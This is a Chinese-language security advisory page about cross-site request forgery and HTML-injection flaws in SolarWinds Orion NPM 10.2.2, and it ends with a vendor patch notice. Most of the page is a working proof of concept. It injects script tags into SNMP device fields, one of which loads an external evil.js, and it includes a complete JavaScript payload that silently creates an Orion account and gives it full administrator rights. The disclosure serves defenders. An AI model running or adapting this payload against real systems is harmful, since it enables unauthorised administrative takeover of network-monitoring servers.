发布日期:2012-07-21
更新日期:2012-08-06受影响系统:
SolarWinds Orion Network Performance Monitor (NPM) 10.2.2
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 54624Orion Network Performance Monitor是带宽性能监控和故障管理软件,能监控并收集来自路由器、交换机、服务器和其他SNMP设备中的数据。SolarWinds Orion Network Performance Monitor (NPM) 10.2.2及其他版本在实现上存在跨站请求伪造漏洞和多个HTML注入漏洞,攻击者可利用这些漏洞在用户会话中执行非法操作,在受影响站点中执行脚本代码,窃取cookie身份验证凭证或控制站点外观。<*来源:Muts (muts@whitehat.co.il)
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!Muts (muts@whitehat.co.il)提供了如下测试方法: syslocation <script>alert("location")</script>
syscontact <script>alert("contact")</script>
sysName <script>alert("name")</scriptsyscontact <script src="http://www.example.com/evil.js"></script>*/
function getCookie(c_name)
{
var i,x,y,ARRcookies=document.cookie.split(";");
for (i=0;i<ARRcookies.length;i++)
{
x=ARRcookies[i].substr(0,ARRcookies[i].indexOf("="));
y=ARRcookies[i].substr(ARRcookies[i].indexOf("=")+1);
x=x.replace(/^s+|s+$/g,"");
if (x==c_name)
{
return unescape(y);
}
}
}function setCookie(c_name,value,exdays)
{
var exdate=new Date();
exdate.setDate(exdate.getDate() + exdays);
var c_value=escape(value) + ((exdays==null) ? "" : ";
expires="+exdate.toUTCString());
document.cookie=c_name + "=" + c_value;
}function postCredentials(viewState, user, password)
{
var http = new XMLHttpRequest();
var url = "/Orion/Admin/Accounts/Add/OrionAccount.aspx?AccountType=Orion";
var params =
"ctl00%24ctl00%24ctl00%24BodyContent%24ScriptManagerPlaceHolder%24MasterScriptManager"
+ "=" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24UpdatePanel1%257Cctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24createWizard%24__CustomNav0%24ImageButton1"
+ "&" +
"__EVENTTARGET" + "=" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24createWizard%24__CustomNav0%24ImageButton1"
+ "&" +
"__EVENTARGUMENT" + "=" + "&" +
"__VIEWSTATE" + "=" + encodeURIComponent(viewState) + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24createWizard%24CreateUserStepContainer%24UserName"
+ "=" + user + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24createWizard%24CreateUserStepContainer%24Password"
+ "=" + password + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24createWizard%24CreateUserStepContainer%24ConfirmPassword"
+ "=" + password + "&" +
"__ASYNCPOST" + "=" + "false"
http.open("POST", url, false);
http.setRequestHeader("Content-type",
"application/x-www-form-urlencoded");
http.setRequestHeader("Content-lenth", params.length);
http.setRequestHeader("Connection", "close");
http.send(params);
var response = http.responseText;
var doc = document.implementation.createHTMLDocument("");
doc.documentElement.innerHTML = response;
return(doc);
}function setAdminPriv(viewState, username)
{
var http = new XMLHttpRequest();
var url = "/Orion/Admin/Accounts/EditAccount.aspx?AccountID=" + username +
"&AccountType=Edit";
var params = "__EVENTTARGET" + "=" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24submitButton"
+ "&" +
"__EVENTARGUMENT" + "=" + "&" +
"__VIEWSTATE" + "=" + encodeURIComponent(viewState) + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24checkboxesVisible"
+ "=" + "hidden" + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ynAccountEnabled%24listBox"
+ "=" + "true" + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24txtAccountExpires"
+ "=" + "Never" + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ynDisableSessionTimeout%24listBox"
+ "=" + "true" + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ynAdminRights%24listBox"
+ "=" + "true" + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ynAllowNodeManagement%24listBox"
+ "=" + "true" + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ynCustomizeViews%24listBox"
+ "=" + "true" + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ynClearEvents%24listBox"
+ "=" + "true" + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ynBrowserIntegration%24listBox"
+ "=" + "true" + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24lbxAlertSound"
+ "=" + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24tbBreadcrumbItems"
+ "=" + "50" + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24tabBars%24tabBars%24ctl00%241%24menuBars"
+ "=" + "Default" + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24tabBars%24tabBars%24ctl01%243%24menuBars"
+ "=" + "Network_TabMenu" + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24tabBars%24tabBars%24ctl02%242%24menuBars"
+ "=" + "Virtualization_TabMenu" + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24lbxHomePageView"
+ "=" + "1" + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24lbxSummaryView"
+ "=" + "1" + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24lbxReportFolder"
+ "=" + "%5CReports" + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24moduleSettings%24rptModules%24ctl00%24ctl00%24ctl08%24ctl00%24ctl00%24ctl01%24lbxNodeDetails"
+ "=" + "-1" + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24moduleSettings%24rptModules%24ctl00%24ctl00%24ctl08%24ctl00%24ctl01%24ctl01%24lbxVolumeDetails"
+ "=" + "3" + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24moduleSettings%24rptModules%24ctl00%24ctl00%24ctl08%24ctl00%24ctl02%24ctl01%24lbxNodeDetails"
+ "=" + "7" + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24moduleSettings%24rptModules%24ctl01%24ctl00%24ctl08%24ctl00%24ctl00%24ctl01%24lbxInterfaceDetails"
+ "=" + "14" + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24moduleSettings%24rptModules%24ctl01%24ctl00%24ctl08%24ctl00%24ctl01%24ctl01%24lbxVSANDetails"
+ "=" + "22" + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24moduleSettings%24rptModules%24ctl01%24ctl00%24ctl08%24ctl00%24ctl02%24ctl01%24lbxUCSChassisDetails"
+ "=" + "24" + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24moduleSettings%24rptModules%24ctl02%24ctl00%24ctl08%24ctl00%24ctl00%24ctl01%24ViewSelector%24lbxViewPicker"
+ "=" + "9" + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24moduleSettings%24rptModules%24ctl02%24ctl00%24ctl08%24ctl00%24ctl01%24ctl01%24ViewSelector%24lbxViewPicker"
+ "=" + "10" + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24moduleSettings%24rptModules%24ctl02%24ctl00%24ctl08%24ctl00%24ctl02%24ctl01%24ViewSelector%24lbxViewPicker"
+ "=" + "11" http.open("POST", url, false);
http.setRequestHeader("Content-type",
"application/x-www-form-urlencoded");
http.setRequestHeader("Content-lenth", params.length);
http.setRequestHeader("Connection", "close");
http.send(params);
var response = http.responseText;
var doc = document.implementation.createHTMLDocument("");
doc.documentElement.innerHTML = response;
return(doc);
}function getHtmlBody(url, ref)
{
var xmlHttp = new XMLHttpRequest();
xmlHttp.open("GET", url, false);
xmlHttp.send(null);
var results = xmlHttp.responseText;
var doc = document.implementation.createHTMLDocument("");
doc.documentElement.innerHTML = results;
return(doc);
}function getViewState(doc)
{
return(doc.getElementById("__VIEWSTATE"));
}var username = "myuser";
var password = "test";// Check if we already attacked the host to avoid duplicated attacks
if (getCookie("o1") == null)
{
// Get the initial view-state
var doc1 =
getHtmlBody("/Orion/Admin/Accounts/Add/OrionAccount.aspx?AccountType=Orion");
// Create a new account with the given credentials
postCredentials(getViewState(doc1).value, username, password);
// Get the edit account view-state
var doc2 = getHtmlBody("/Orion/Admin/Accounts/EditAccount.aspx?AccountID="
+ username + "&AccountType=Edit");
// Assign our new account with administrative privileges
setAdminPriv(getViewState(doc2).value, username);
// Set the cookie to avoid duplicated attacks
setCookie("o1", 1, "");
}建议:
--------------------------------------------------------------------------------
厂商补丁:SolarWinds
----------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http://solarwinds.netCitrix Access Gateway多个安全漏洞LibreOffice和OpenOffice多个堆缓冲区溢出漏洞相关资讯 HTML注入漏洞
- Symantec Security Information (07/05/2013 16:04:54)
- Django CMS "page_attribute" (01/29/2013 10:18:23)
- IBM Intelligent Operations (12/20/2012 08:24:59)
| - TP-Link TL-WA701N和TL-WA701ND目 (03/01/2013 21:04:10)
- Advantech WebAccess HMI/SCADA (01/10/2013 08:07:25)
- MyBB User Profile Skype ID插件“ (12/19/2012 18:55:16)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
|
易网时代-编程资源站